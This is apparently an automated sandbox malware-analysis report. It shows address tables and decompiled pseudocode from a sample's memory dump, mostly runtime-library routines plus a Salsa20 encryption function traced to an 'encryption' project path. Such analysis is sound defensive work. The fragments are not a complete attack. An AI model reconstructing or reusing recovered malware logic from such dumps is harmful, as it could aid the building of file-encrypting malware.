0x004103f2
0x004103f7
0x004103fc
0x004103fc
0x00410401
0x00410408
0x0041040f
0x00410417
0x00410433
0x00410436
0x00410419
0x0041041c
0x0041041d
0x00410427
0x0041042c
0x0041042c
0x0041041d
0x0041043f
0x00410445
0x0041044a
0x00410451
0x00410458
0x00410458
0x0041045f
0x00410467
0x0041046c
0x0041046c
0x0041046f
0x00410471
0x00410481
0x00410489
0x00410490
0x00410496
0x0041049c
0x0041049e
0x0041049e
0x004104a1
0x004104a1
0x004104a4
0x004104a7
0x004104ae
0x004104b0
0x004104b0
0x004104b5
0x004104d2
0x004104d9
0x004104df
0x004104e4
0x004104e9
0x004104e9
0x004104ee
0x004104f5
0x004104fc
0x00410504
0x00410520
0x00410523
0x00410506
0x00410509
0x0041050a
0x00410514
0x00410519
0x00410519
0x0041050a
0x0041052c
0x00410532
0x00410537
0x0041053e
0x00410545
0x00410545
0x0041054c
0x00410558
0x0041055d
0x0041055d
0x00000000
0x0041054c
0x00410498
0x00000000
0x00410498
0x00410568
0x00410728
0x0041072c
0x00410731
0x00410736
0x00410736
0x0041073b
0x00410743
0x0041074a
0x00410751
0x00410755
0x0041075a
0x0041075f
0x0041075f
0x00410770
0x00410775
0x0041077c
0x0041077e
0x0041077e
0x00410792
0x00410794
0x0041079c
0x004107a1
0x004107a1
0x004107a6
0x004107ad
0x004107af
0x004107b6
0x004107c0
0x004109c7
0x004109cb
0x004109d0
0x004109d5
0x004109d5
0x004109d8
0x004109da
0x004109e1
0x004109e8
0x00000000
0x004107c6
0x004107c6
0x004107d0
0x004107d0
0x004107d5
0x004107e0
0x004107e0
0x004107e6
0x00000000
0x00000000
0x004107eb
0x00410802
0x00410802
0x0041080b
0x0041080d
0x00000000
0x00000000
0x00410813
0x00410818
0x00410820
0x00410820
0x00410826
0x00000000
0x00000000
0x0041082b
0x00410842
0x00410842
0x0041084b
0x0041084d
0x00000000
0x00000000
0x0041085a
0x004108bf
0x004108c6
0x004108c8
0x004108ca
0x004108ca
0x004108d1
0x004108d8
0x004108db
0x004108e5
0x004108ed
0x004108f2
0x004108fe
0x00410904
0x0041090a
0x0041090a
0x00410910
0x00410910
0x00410913
0x00410916
0x0041091d
0x00000000
0x00410900
0x00410900
0x0041091f
0x0041091f
0x0041092a
0x00410936
0x0041093b
0x00410944
0x0041094e
0x00410950
0x00410950
0x00410952
0x00410953
0x00410954
0x00410959
0x0041095e
0x00410963
0x0041096d
0x0041096f
0x0041096f
0x00410978
0x00410979
0x0041097d
0x0041097e
0x00410983
0x00410988
0x00410990
0x00410990
0x00410988
0x00410995
0x00410995
0x0041099d
0x004109a2
0x004109a7
0x004109a7
0x00000000
0x0041099d
0x004108fe
0x00410869
0x00410871
0x0041087b
0x0041087f
0x00410884
0x00410885
0x0041088a
0x0041088c
0x0041088e
0x00410895
0x0041089d
0x004108a4
0x004108b2
0x004108b7
0x00000000
0x004108b7
0x0041082d
0x00410831
0x00410835
0x00000000
0x00000000
0x00410837
0x0041083a
0x00410840
0x00000000
0x00000000
0x00000000
0x00410840
0x00410846
0x00410848
0x00000000
0x00410848
0x004107ed
0x004107f1
0x004107f5
0x00000000
0x00000000
0x004107f7
0x004107fa
0x00410800
0x00000000
0x00000000
0x00000000
0x00410800
0x00410806
0x00410808
0x00000000
0x004109aa
0x004109b8
0x004109c1
0x00000000
0x004109c1
0x004107c0
0x0041056e
0x00410573
0x00410575
0x00410577
0x0041057e
0x00410586
0x0041058d
0x00410592
0x00410597
0x0041059c
0x00000000
0x00000000
0x004105a2
0x004105ad
0x004105ba
0x004105bf
0x004105c3
0x004105c5
0x004105c8
0x004105cd
0x004105eb
0x004105eb
0x004105f0
0x004105f5
0x004105ff
0x00410601
0x00410601
0x00410605
0x0041060b
0x00410610
0x00410620
0x00410628
0x0041062f
0x00410638
0x0041063d
0x00410642
0x00410642
0x00410645
0x0041064a
0x00410651
0x00410658
0x0041065f
0x00410688
0x00410661
0x00410664
0x00410665
0x00410675
0x0041067a
0x0041067d
0x0041067d
0x00410665
0x00410691
0x00410697
0x0041069c
0x004106a7
0x004106ae
0x004106b3
0x004106b9
0x004106c0
0x004106c2
0x004106c4
0x004106c4
0x004106c8
0x004106d5
0x004106db
0x004106dd
0x004106dd
0x004106e1
0x004106e7
0x004106ec
0x004106ee
0x004106f0
0x004106f7
0x004106ff
0x00410706
0x0041070d
0x00410713
0x00410718
0x00410718
0x0041071d
0x00410720
0x00410725
0x00410725
0x00000000
0x0041071d
0x004105d0
0x004105d7
0x004105df
0x004105e3
0x004105e4
0x004105e7
0x00000000
0x004105d0
0x00410363
0x00000000
0x004101bc
0x004101bc
0x004101c0
0x004101c2
0x004101c9
0x004101cc
0x004101d6
0x004101de
0x004101eb
0x004101ef
0x004101f6
0x004101fe
0x00410205
0x0041020c
0x00410211
0x00410215
0x0041021b
0x004102a3
0x004102a7
0x004102ac
0x004102b1
0x004102b1
0x004102b6
0x004102bd
0x004102c4
0x004102cb
0x004102cf
0x004102d4
0x004102d9
0x004102d9
0x00000000
0x004102cf
0x00410221
0x00410227
0x00000000
0x00410229
0x00410230
0x0041023a
0x0041023c
0x00410246
0x0041024b
0x0041024b
0x00410254
0x0041025a
0x00410263
0x00410265
0x0041026f
0x00410277
0x00410277
0x00410283
0x0041028b
0x00410290
0x00410295
0x0041029a
0x0041036b
0x00410370
0x00410375
0x00410375
0x00410378
0x0041037a
0x00410385
0x0041038c
0x00410390
0x00410399
0x0041039e
0x0041039e
0x004109ec
0x004109f0
0x004109f5
0x004109fa
0x00410a02
0x00410a0d
0x004102a0
0x004102a0
0x00000000
0x004102a0
0x0041029a
0x004102dc
0x004102dc
0x004102dd
0x004102e0
0x00000000
0x004101c0

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
_memmove.LIBCMT ref: 00410427
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
_memmove.LIBCMT ref: 00410514

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
Opcode Fuzzy Hash: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004382A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004382A2(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
					if(E00437413(_t28, ?str?) != 0) {
						return E00423C92(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}

0x004382a6
0x004382ab
0x004382d3
0x00000000
0x004382fc
0x004382ee
0x0043831a
0x00000000
0x0043831a
0x00000000
0x004382f0
0x00438318
0x00000000
0x00000000
0x0043831e
0x00438323
0x00438327
0x00438327
0x004382f5

APIs

_wcscmp.LIBCMT ref: 004382B9
_wcscmp.LIBCMT ref: 004382CA
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310

Strings

OCP, xrefs: 004382C4
ACP, xrefs: 004382B3

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E0040C070(intOrPtr __ecx, void* __edx, void* __esi, signed int* _a4, signed char* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v128;
				char _v190;
				void* __ebx;
				void* __edi;
				intOrPtr _t174;
				signed int _t186;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t229;
				signed int _t235;
				signed int _t237;
				void* _t244;
				intOrPtr _t248;
				signed char _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t258;
				signed int _t260;
				signed int _t262;
				signed int _t264;
				signed int _t266;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int* _t272;
				signed int _t276;
				signed int _t277;
				intOrPtr _t284;
				void* _t285;
				void* _t286;
				signed int _t288;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t292;
				signed char* _t293;
				signed int _t294;
				signed int _t295;
				signed char* _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				char* _t301;
				void* _t303;
				void* _t305;
				void* _t313;

				_t297 = __esi;
				_t286 = __edx;
				_t251 = _a4;
				_t174 = __ecx;
				_v56 = __ecx;
				_t293 = _a8;
				if(_a4 == 0) {
					L2:
					_push(0x7a);
					E004211DD(_t251, _t286, _t293, _t297, _t309, L"input != nullptr && output != nullptr", L"e:\\doc\\my work (c++)\\_git\\encryption\\encryptionwinapi\\Salsa20.inl");
					_t174 = _v56;
				} else {
					_t309 = _t293;
					if(_t293 == 0) {
						goto L2;
					}
				}
				if(_a12 != 0) {
					_v128 = _t174 -  &_v190;
					_push(_t297);
					do {
						asm("movdqu xmm0, [eax]");
						_v60 = 0xa;
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [eax+0x10]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [eax+0x20]");
						asm("movdqu [ebp-0x58], xmm0");
						_t294 = _v80;
						asm("movdqu xmm0, [eax+0x30]");
						_v8 = _v84;
						_v36 = _v88;
						_v16 = _v92;
						_v48 = _v96;
						_v44 = _v100;
						_v32 = _v104;
						_v12 = _v108;
						_v40 = _v112;
						asm("movdqu [ebp-0x48], xmm0");
						_t252 = _v76;
						_t276 = _v64;
						_t288 = _v68;
						_t298 = _v72;
						_v28 = _v116;
						_v24 = _v120;
						_t186 = _v124;
						_v52 = _t252;
						_v20 = _t186;
						do {
							asm("rol eax, 0x7");
							_v12 = _v12 ^ _t186 + _t252;
							asm("rol eax, 0x9");
							_v16 = _v16 ^ _v12 + _v20;
							asm("rol eax, 0xd");
							_t254 = _v52 ^ _v16 + _v12;
							_v52 = _t254;
							asm("ror eax, 0xe");
							_v20 = _v20 ^ _v16 + _t254;
							asm("rol eax, 0x7");
							_v36 = _v36 ^ _v24 + _v32;
							asm("rol eax, 0x9");
							_t299 = _t298 ^ _v36 + _v32;
							_t255 = _v44;
							asm("rol eax, 0xd");
							_v24 = _v24 ^ _v36 + _t299;
							asm("ror eax, 0xe");
							_v32 = _v32 ^ _v24 + _t299;
							asm("rol eax, 0x7");
							_t289 = _t288 ^ _v8 + _t255;
							asm("rol eax, 0x9");
							_v28 = _v28 ^ _v8 + _t289;
							asm("rol eax, 0xd");
							_t256 = _t255 ^ _v28 + _t289;
							_v44 = _t256;
							asm("ror eax, 0xe");
							_v8 = _v8 ^ _v28 + _t256;
							asm("rol eax, 0x7");
							_t258 = _v40 ^ _t294 + _t276;
							_v40 = _t258;
							asm("rol eax, 0x9");
							_t260 = _v48 ^ _t258 + _t276;
							_v48 = _t260;
							asm("rol eax, 0xd");
							_t295 = _t294 ^ _v40 + _t260;
							asm("ror eax, 0xe");
							_t277 = _t276 ^ _t260 + _t295;
							asm("rol eax, 0x7");
							_v24 = _v24 ^ _v20 + _v40;
							_t217 = _v24;
							_v120 = _t217;
							asm("rol eax, 0x9");
							_v28 = _v28 ^ _t217 + _v20;
							_t219 = _v28;
							_v116 = _t219;
							asm("rol eax, 0xd");
							_t262 = _v40 ^ _t219 + _v24;
							_v40 = _t262;
							asm("ror eax, 0xe");
							_v112 = _t262;
							_t264 = _v20 ^ _v28 + _t262;
							asm("rol eax, 0x7");
							_v44 = _v44 ^ _v32 + _v12;
							_t225 = _v44;
							_v100 = _t225;
							asm("rol eax, 0x9");
							_v20 = _t264;
							_v124 = _t264;
							_t266 = _v48 ^ _t225 + _v32;
							_v48 = _t266;
							asm("rol eax, 0xd");
							_v12 = _v12 ^ _v44 + _t266;
							_t229 = _v12;
							_v108 = _t229;
							asm("ror eax, 0xe");
							_v96 = _t266;
							_t268 = _v32 ^ _t229 + _t266;
							_v32 = _t268;
							_v104 = _t268;
							_t269 = _v36;
							asm("rol eax, 0x7");
							_t294 = _t295 ^ _v8 + _t269;
							asm("rol eax, 0x9");
							_v16 = _v16 ^ _v8 + _t294;
							_t235 = _v16;
							_v92 = _t235;
							asm("rol eax, 0xd");
							_t270 = _t269 ^ _t235 + _t294;
							_t237 = _t270;
							_v36 = _t270;
							_v88 = _t237;
							asm("ror eax, 0xe");
							_v8 = _v8 ^ _t237 + _v16;
							_v84 = _v8;
							asm("rol eax, 0x7");
							_t252 = _v52 ^ _t277 + _t289;
							_v52 = _t252;
							_v76 = _t252;
							asm("rol eax, 0x9");
							_t298 = _t299 ^ _t277 + _t252;
							asm("rol eax, 0xd");
							_t288 = _t289 ^ _t298 + _t252;
							asm("ror eax, 0xe");
							_t276 = _t277 ^ _t288 + _t298;
							_t138 =  &_v60;
							 *_t138 = _v60 - 1;
							_t186 = _v20;
						} while ( *_t138 != 0);
						_t272 = _a4;
						_t244 = 0;
						_v80 = _t294;
						_t296 = _a8;
						_v64 = _t276;
						_v68 = _t288;
						_v72 = _t298;
						do {
							_t301 =  &_v190 + _t244;
							 *(_t305 + _t244 - 0x78) =  *(_t305 + _t244 - 0x78) +  *((intOrPtr*)(_t301 + _v128));
							_t290 =  *(_t305 + _t244 - 0x78);
							 *((char*)(_t301 - 1)) = _t290 >> 8;
							 *(_t305 + _t244 - 0xbc) = _t290;
							_t244 = _t244 + 4;
							 *_t301 = _t290 >> 0x10;
							 *((char*)(_t301 + 1)) = _t290 >> 0x18;
							_t313 = _t244 - 0x40;
						} while (_t313 < 0);
						_t284 = _v56;
						_t292 = _a12;
						 *((intOrPtr*)(_t284 + 0x20)) =  *((intOrPtr*)(_t284 + 0x20)) + 1;
						 *((intOrPtr*)(_t284 + 0x24)) =  *((intOrPtr*)(_t284 + 0x24)) + (0 | _t313 == 0x00000000);
						_t303 =  >=  ? 0x40 : _t292;
						_t285 = 0;
						if(_t303 == 0) {
							goto L12;
						} else {
							goto L10;
						}
						do {
							L10:
							_t292 = _t292 - 1;
							_t250 =  *(_t305 + _t285 - 0xbc) ^  *_t272;
							_t285 = _t285 + 1;
							 *_t296 = _t250;
							_t272 =  &(_t272[0]);
							_t296 =  &(_t296[1]);
						} while (_t285 < _t303);
						_a12 = _t292;
						_a4 = _t272;
						_a8 = _t296;
						L12:
						_t248 = _v56;
					} while (_t292 != 0);
					return _t248;
				}
				return _t174;
			}

0x0040c070
0x0040c070
0x0040c07a
0x0040c07d
0x0040c07f
0x0040c083
0x0040c088
0x0040c08e
0x0040c08e
0x0040c09a
0x0040c09f
0x0040c08a
0x0040c08a
0x0040c08c
0x00000000
0x00000000
0x0040c08c
0x0040c0a9
0x0040c0b9
0x0040c0bc
0x0040c0c0
0x0040c0c0
0x0040c0c4
0x0040c0cb
0x0040c0d0
0x0040c0d5
0x0040c0da
0x0040c0df
0x0040c0e4
0x0040c0e7
0x0040c0ef
0x0040c0f5
0x0040c0fb
0x0040c101
0x0040c107
0x0040c10d
0x0040c113
0x0040c119
0x0040c11f
0x0040c124
0x0040c127
0x0040c12a
0x0040c12d
0x0040c130
0x0040c136
0x0040c139
0x0040c13c
0x0040c13f
0x0040c142
0x0040c147
0x0040c14a
0x0040c153
0x0040c156
0x0040c15f
0x0040c162
0x0040c169
0x0040c16c
0x0040c16f
0x0040c178
0x0040c17b
0x0040c184
0x0040c187
0x0040c189
0x0040c191
0x0040c194
0x0040c19c
0x0040c19f
0x0040c1a7
0x0040c1aa
0x0040c1b1
0x0040c1b4
0x0040c1bc
0x0040c1bf
0x0040c1c6
0x0040c1cc
0x0040c1cf
0x0040c1d5
0x0040c1d8
0x0040c1da
0x0040c1e3
0x0040c1e6
0x0040c1ed
0x0040c1f0
0x0040c1f3
0x0040c1f8
0x0040c1fb
0x0040c203
0x0040c206
0x0040c209
0x0040c20c
0x0040c212
0x0040c215
0x0040c218
0x0040c21b
0x0040c221
0x0040c227
0x0040c22e
0x0040c231
0x0040c234
0x0040c23a
0x0040c242
0x0040c245
0x0040c248
0x0040c24b
0x0040c251
0x0040c254
0x0040c257
0x0040c25d
0x0040c264
0x0040c267
0x0040c26a
0x0040c26d
0x0040c270
0x0040c275
0x0040c278
0x0040c27e
0x0040c283
0x0040c286
0x0040c289
0x0040c28e
0x0040c291
0x0040c298
0x0040c29b
0x0040c29e
0x0040c2a1
0x0040c2a6
0x0040c2a9
0x0040c2ab
0x0040c2ad
0x0040c2b3
0x0040c2b9
0x0040c2bc
0x0040c2c2
0x0040c2c8
0x0040c2cb
0x0040c2cd
0x0040c2d0
0x0040c2d6
0x0040c2d9
0x0040c2de
0x0040c2e1
0x0040c2e6
0x0040c2e9
0x0040c2eb
0x0040c2eb
0x0040c2ee
0x0040c2ee
0x0040c2f7
0x0040c2fa
0x0040c2fc
0x0040c2ff
0x0040c302
0x0040c305
0x0040c308
0x0040c310
0x0040c319
0x0040c31e
0x0040c322
0x0040c32b
0x0040c330
0x0040c337
0x0040c340
0x0040c342
0x0040c345
0x0040c345
0x0040c34a
0x0040c352
0x0040c357
0x0040c35d
0x0040c368
0x0040c36b
0x0040c36f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c371
0x0040c371
0x0040c378
0x0040c379
0x0040c37b
0x0040c37c
0x0040c37e
0x0040c37f
0x0040c380
0x0040c384
0x0040c387
0x0040c38a
0x0040c38d
0x0040c38d
0x0040c390
0x00000000
0x0040c398
0x0040c39e

APIs

__wassert.LIBCMT ref: 0040C09A

Strings

e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
input != nullptr && output != nullptr, xrefs: 0040C095

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: __wassert
String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
API String ID: 3993402318-1975116136
Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54

Uniqueness

Uniqueness Score: -1.00%

Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E00424168(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				char _v800;
				signed int _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t41;
				char* _t46;
				char* _t48;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t59 = __ebx;
				_t41 =  *0x50ad20; // 0x934ff656
				_t42 = _t41 ^ _t69;
				_v8 = _t41 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00432A69(_t42);
					_pop(_t60);
				}
				_v804 = _v804 & 0x00000000;
				E0042B420( &_v800, 0, 0x4c);
				_v812 =  &_v804;
				_t46 =  &_v724;
				_v808 = _t46;
				_v548 = _t46;
				_v552 = _t60;
				_v556 = _t65;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t23);
				_v540 = _v0;
				_t48 =  &_v0;
				_v528 = _t48;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t48 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				if(E004329EC( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00432A69(_t55);
				}
				return E0042A77E(_t59, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x00424168
0x00424168
0x00424168
0x00424171
0x00424176
0x00424178
0x00424180
0x00424182
0x00424185
0x0042418a
0x0042418a
0x0042418b
0x0042419d
0x004241ab
0x004241b1
0x004241b7
0x004241bd
0x004241c3
0x004241c9
0x004241cf
0x004241d5
0x004241db
0x004241e1
0x004241e8
0x004241ef
0x004241f6
0x004241fd
0x00424204
0x0042420b
0x0042420c
0x00424215
0x0042421b
0x0042421e
0x00424224
0x00424231
0x0042423a
0x00424243
0x0042424c
0x00424258
0x00424269
0x00424275
0x00424278
0x0042427d
0x0042428c

APIs

_memset.LIBCMT ref: 0042419D
IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252

Strings

i;B, xrefs: 00424168

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: DebuggerPresent_memset
String ID: i;B
API String ID: 2328436684-472376889
Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59

Uniqueness

Uniqueness Score: -1.00%

Function 004329EC Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004329EC(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x004329f1
0x00432a01

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00424266,?,?,?,00000001), ref: 004329F1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004329FA

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
Instruction ID: d7915fe9b98f2e2675b1eb18c11ae3c40c3bb41b36f5f7d781b256b54fe46c91
Opcode Fuzzy Hash: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
Instruction Fuzzy Hash: A7B09271044208ABDA802B93EC59F883F28EB04A62F084022F60D444628F6254508E99

Uniqueness

Uniqueness Score: -1.00%

Function 004387C8 Relevance: 1.5, APIs: 1, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E004387C8(signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				signed int _t6;
				int _t8;

				_t5 =  *0x5292d8; // 0xe554b086
				_t6 = _t5 ^  *0x50ad20;
				if(_t6 == 0) {
					 *0x511344 = _a4;
					_t8 = EnumSystemLocalesW(E004387B4, 1);
					 *0x511344 =  *0x511344 & 0x00000000;
					return _t8;
				} else {
					return  *_t6(_a4, _a8, _a12, 0);
				}
			}

0x004387cb
0x004387d0
0x004387d6
0x004387f1
0x004387f6
0x004387fc
0x00438804
0x004387d8
0x004387e6
0x004387e6

APIs

EnumSystemLocalesW.KERNEL32(004387B4,00000001,?,004376BC,0043775A,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004387F6

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 76856dd23a8d71a9a59fa0d60a1051abde5b3be4023d9c7dc77f759e2ff7a53d
Instruction ID: e2c19f37e5f1fa56fd16d2c75426893bf8b780345540c0397aa12dc95392e8cd
Opcode Fuzzy Hash: 76856dd23a8d71a9a59fa0d60a1051abde5b3be4023d9c7dc77f759e2ff7a53d
Instruction Fuzzy Hash: 4DE08C32150308FBCF21CFA0EC41FD83BA6BB58710F104419F61C4AA60CB71A964EB48

Uniqueness

Uniqueness Score: -1.00%

Function 0043884E Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,20001004,?,0042580F,?,0042580F,?,20001004,?,00000002,?,00000004,?,00000000), ref: 00438875

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
